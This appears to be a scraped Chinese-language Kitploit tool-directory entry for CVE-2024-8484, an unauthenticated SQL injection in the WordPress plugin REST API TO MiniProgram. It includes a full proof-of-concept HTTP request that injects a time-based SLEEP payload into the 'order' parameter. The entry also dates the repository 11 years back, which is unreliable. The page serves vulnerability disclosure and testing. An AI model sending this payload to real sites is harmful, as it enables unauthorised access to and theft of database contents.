Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-8484 — REST API TO MiniProgram <= 4.7.1 - 未认证 SQL 注入 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-8484
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubrandomrobbiebf/cve-2024-8484

CVE-2024-8484

REST API TO MiniProgram <= 4.7.1 - 未认证 SQL 注入

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-8484

REST API TO MiniProgram <= 4.7.1 - 未经身份验证的 SQL 注入

root@kitploit:~
CVE: CVE-2024-8484
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS Score: 7.5
Slugs: rest-api-to-miniprogram

描述:

WordPress 的 REST API TO MiniProgram 插件在包括 4.7.1 在内的所有版本中,由于对用户提供的 'order' 参数转义不足,并且对现有 SQL 查询缺乏充分的预处理,导致 /wp-json/watch-life-net/v1/comment/getcomments REST API 端点的 'order' 参数存在 SQL 注入漏洞。这使得未经身份验证的攻击者能够将额外的 SQL 查询附加到现有查询中,从而用于提取数据库中的敏感信息。

POC

root@kitploit:~
GET /wp-json/watch-life-net/v1/comment/getcomments?order=DESC,(SELECT(1)FROM(SELECT(SLEEP(10)))a)--&postid=3&limit=1&page=1&page=1 HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/post-new.php?post_type=page
Connection: keep-alive
If-Modified-Since: Mon, 16 Sep 2024 18:56:28 GMT
If-None-Match: "5a3-62241215fdfaa-gzip"
Priority: u=2

alt text

下载工具